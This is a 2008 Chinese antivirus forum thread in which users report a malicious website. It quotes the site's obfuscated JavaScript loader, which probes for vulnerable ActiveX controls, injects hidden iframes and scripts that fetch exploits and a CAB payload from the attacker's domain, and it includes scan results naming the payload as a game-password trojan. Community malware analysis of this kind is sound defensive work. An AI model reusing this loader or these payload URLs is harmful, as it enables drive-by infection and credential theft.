查看: 3080|回复: 14
收起左侧

[已鉴定] 发个毒网

 关闭 [复制链接]
卡江东N
发表于 2008-1-23 14:42:16 | 显示全部楼层 |阅读模式
RT
www.sotians.cn
费尔报
IllusionWing
发表于 2008-1-23 14:45:24 | 显示全部楼层
卡6报http://www.sotians.cn/img/css.js

var Then=new Date();
asdfasf="fldsajfldsajflas";
Then.setTime(Then.getTime()+2*60*60*1000);
var cookieString=new String(document.cookie);
var cookieHeader="Cookie1=";
asdfasf="fldsajfldsajflas";
var beginPosition=cookieString.indexOf(cookieHeader);
document.write('<iframe style=display:none width=50 height=0 src="http://www.sotians.cn/img/real.gif"></iframe>');
asdfasf="fldsajfldsajflas";
if(beginPosition==-1){asdfasf="fldsajfldsajflas";
document.cookie="Cookie1=POPWINDOS;
expires="+Then.toGMTString();
try{if(new ActiveXObject("Microsoft.XMLHTTP"))document.write('<script src="http://www.sotians.cn/img/xpkk.js"></script>')}catch(e){}try{if(new ActiveXObject("DPClient.Vod"))document.write('<iframe style=display:none src="http://www.sotians.cn/img/tok.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("MPS.StormPlayer.1"))document.write('<iframe style=display:none src="http://www.sotians.cn/img/xpbf.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("e.PowerPlayerCtrl.1"))document.write('<iframe style=display:none src="http://www.sotians.cn/img/pps.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("Pdg2"))document.write('<iframe style=display:none src="http://www.sotians.cn/img/reader.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("GLCHAT.GLChatCtrl.1"))document.write('<iframe style=display:none src="http://www.sotians.cn/img/xplz.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("BaiduBar.Tool.1"))document.write('<iframe style=display:none src="http://www.sotians.cn/img/baidu.gif"></iframe>')}catch(e){}}

改时间,还有N多expolit
卡江东N
 楼主| 发表于 2008-1-23 14:48:09 | 显示全部楼层
我的费尔就报了一个
卡江东N
 楼主| 发表于 2008-1-23 14:49:39 | 显示全部楼层
利用了RsalPlayer的漏洞[:27:]
IllusionWing
发表于 2008-1-23 14:50:36 | 显示全部楼层
pps.gif - 404
解码如下
real.gif - Expolit.Real 不会解码.....
最后是这个毒
http://www.sotians.cn/img/svcoss.cab
IllusionWing
发表于 2008-1-23 14:54:02 | 显示全部楼层
老毒了

svcoss.rar

21.17 KB, 下载次数: 77

mofunzone
发表于 2008-1-23 15:03:07 | 显示全部楼层
Starting the file scan:

Begin scan in 'C:\TDDOWNLOAD\svcoss.cab'
C:\TDDOWNLOAD\
  svcoss.cab
    [0] Archive type: CAB (Microsoft)
      --> svcoss.exe
        [1] Archive type: Runtime Packed
        --> Object
          [2] Archive type: RSRC
          --> Object
              [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.mtw
              [WARNING]   Infected files in archives cannot be repaired!
      [INFO]      The file was deleted!
ballakay
发表于 2008-1-23 15:35:24 | 显示全部楼层
安全卫士不允许访问!
这次居然让他抢到头功,不容易呀!
啊弥陀佛
发表于 2008-1-23 16:34:06 | 显示全部楼层
微点砍掉
未命名.JPG
悠柚
发表于 2008-1-23 16:37:52 | 显示全部楼层
蜘蛛 D:\temp\4mwcxb9i.rar\svcoss.exe - infected with Trojan.PWS.Gamania.6669

Archive contains an infected item
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-16 17:59 , Processed in 0.136930 second(s), 20 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表